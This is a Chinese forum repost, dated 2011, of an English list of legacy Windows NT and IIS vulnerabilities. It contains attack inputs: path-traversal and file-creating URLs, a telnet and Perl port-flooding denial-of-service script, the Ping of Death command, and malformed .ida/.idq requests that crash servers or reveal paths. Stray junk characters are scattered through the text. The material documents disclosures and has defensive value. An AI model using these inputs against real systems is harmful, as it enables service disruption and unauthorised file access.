標(biāo)題: NT的漏洞及描述(英文) [打印本頁(yè)] 作者: 雜七雜八 時(shí)間: 2011-1-13 17:12 標(biāo)題: NT的漏洞及描述(英文) 受影響系統(tǒng):4.0,iis 1.0 Y3 c. h$ t) `, z- |A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory. & r! X) `5 J; M5 Z& v6 U7 [3 R- c. o. o' d8 n2 O
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script. # o2 s- n$ p% w0 }1 \ 1 o) B! E6 a) b2 D4 I( DBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.0 x' h! J$ v! Y8 ~% [
) Y) z( k- V9 d5 r2 ~3 a( z-------------------------------------------------------------------- 7 s7 M1 r4 i8 g7 [ ; m L: L" f. x3 |" _; d4 _受影響系統(tǒng):4.0 & P S( `7 m# V: ` t7 U m1 _' |A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''. " E! S% W5 S' N; w5 Z. A. n- |0 L" |6 M& O! f9 d, `
If the file 'target.bat' exists, the file will be truncated. % n j. c& {; n" N! ^0 K f, B. ^. M% P5 a% T5 x/ c' I9 @* o$ U" L
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.9 S, r2 h5 ?1 n4 A( S
6 z0 L {( _& K; `$ ]" {/ Q----------------------------------------------------------------------: G" r4 W% _& k9 T
; }. N( ^, l2 I4 a8 E: A受影響系統(tǒng):3.51,4.0 2 y% I7 j4 T8 D. t2 A& X6 j# kMultiple service ports (53, 135, 1031) are vunerable to 'confusion'. , n" u9 l& T' F* v0 g / J$ o1 }# W" V! w2 eThe following steps;3 r, S: n# x8 P& Q9 P
. g9 Q6 g6 f. FTelnet to an NT 4.0 system on port 135 % z5 p+ L9 R, z$ j5 L; ~# d
Type about 10 characters followed by a <CR> ! P& C; I) i& N& s# |' j
Exit Telnet 6 P6 ?) [& [) k( Yresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.; O( s* k! V8 O+ r% J. n
6 T- F" e5 @8 t3 LWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.6 Q+ z2 d- f! Q( e9 K# [, D6 b
, a8 W" O: k' v4 a r! l: }
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted." ?- [0 [3 A- p3 J
& ?6 c) @: l- u3 c O
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning., E0 z n1 W2 H* ^8 ~0 J7 |
4 b! ^/ X0 n! u) B8 j% ]
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit): 8 q* y6 ?% D+ `/ h: H$ H/ D, W5 Q: ]5 x4 d
/*begin poke code*/ 1 |% j) l% A9 ?) B, Q- { 3 z- M/ x$ I S: yuse Socket; " s# H& t& m# O! P9 Zuse FileHandle;4 a2 }: P% I v1 f; z
require "chat2.pl"; ' k3 `) y) [; k4 D. D- K& w# L7 m5 T9 } [$ L% X- `/ Y
$systemname = $ARGV[0] && shift; * K: u: x6 B3 ]* ~ Q: U# ~+ N$ a8 @5 p$verbose = 1; # tell me what you're hitting 8 u% U* J% p7 C7 E, K# A1 j$knownports = 1; # don't hit known problem ports r j* a8 m2 h4 y3 w. ?- xfor ($port = $0; $port<65535; $port++) * d4 x3 J; {' u# r y* K{0 X" s/ e6 u- r( s8 Y3 g9 v: z- e
& c9 S @5 G& g, `
5 E8 H) M$ \/ h
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) { 7 i: r0 `; V( t/ B/ Bnext; / a( _: `' }$ u2 B/ |} + K; Z+ y6 M' r& V1 i% e" Z k$fh = chat::open_port($systemname, $port); 0 `* i1 T; g0 e1 B zchat::print ($fh,"This is about ten characters or more");' Y0 Z7 {! t$ h
if ($verbose) { 6 k# g1 j/ _# v$ ~& Sprint "Trying port: $port\n"; 5 [( d' W3 J$ Y4 [6 [} : h4 \$ E- B' X' F1 E8 A* g6 Qchat::close($fh);2 J1 F7 o1 [- n. O
9 j" |& C+ i& u. v3 v9 i}3 d* G3 u+ g6 f7 i6 c- I3 | i
- h0 g. n) a) \1 j7 N
2 V. @$ a0 `9 P/ Y+ Q
/*end poke code*/ , u Y* |6 x! r6 c2 E. Z" U* E4 l* g) E9 ^5 r5 o! N+ r
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername/ v4 Z# j$ Z6 S: [1 J
' n9 w5 c! B! a9 W8 \/ g1 f" l--------------------------------------------------------------------------------+ @& {. V% G! R# u& |
7 ]3 L6 G- y9 r
受影響系統(tǒng):4.0 3 M4 u! [2 B: o$ r% i0 JUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS. ! G& }% j/ D2 [& C/ u! z: i) I6 d0 a# M" y1 z# E/ j
This attack causes Dr. Watson to display an alert window and to log an error: ' |; g! d4 g- ]% r" x7 v/ H$ X- T5 p3 H6 C! n
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT". @% {1 Y- J$ m2 |/ \
+ b( h- o% ?7 G7 o% k# a" M-------------------------------------------------------------------------------- 1 D/ a5 u `- m) d- K8 T+ G e0 D+ U+ |; I0 S
受影響系統(tǒng):3.51,4.0 / F2 |! O' }3 `0 e9 v' fLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:1 r6 ~0 k2 D" Q
# v# Y% T& ^% {4 V, m' ^' P; X1 k1 ?5 x
STOP: 0X0000001E: k y) G- ?; d9 s; o0 b
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS ( W4 t' ]: \6 W ( j: E! H+ u; v" d% f$ l-OR-4 c" o' X; H1 X" c4 Z
( v- v& q! }% a4 T2 v& b# sSTOP: 0x0000000A - u) B% t3 B" d t# yIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS. G; O0 s9 ]3 F- j. ?; ?9 w
3 K+ g% T4 U' C* H$ v! ]: B. |NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets. + X0 o* }7 p5 I' b $ z" D9 _* w- P* O: a4 `-------------------------------------------------------------------------------- / q; w0 {- f; r" ~3 ^: {& b* k0 K1 A" W6 R# Y" O
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). 8 v0 M V0 y4 X$ s; s) Y3 ] & r4 m! y+ u5 i5 M6 q' ~: a2 T-------------------------------------------------------- % C% q# L5 c ~; C # F; y& E! x( v. u; a# L/ dIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server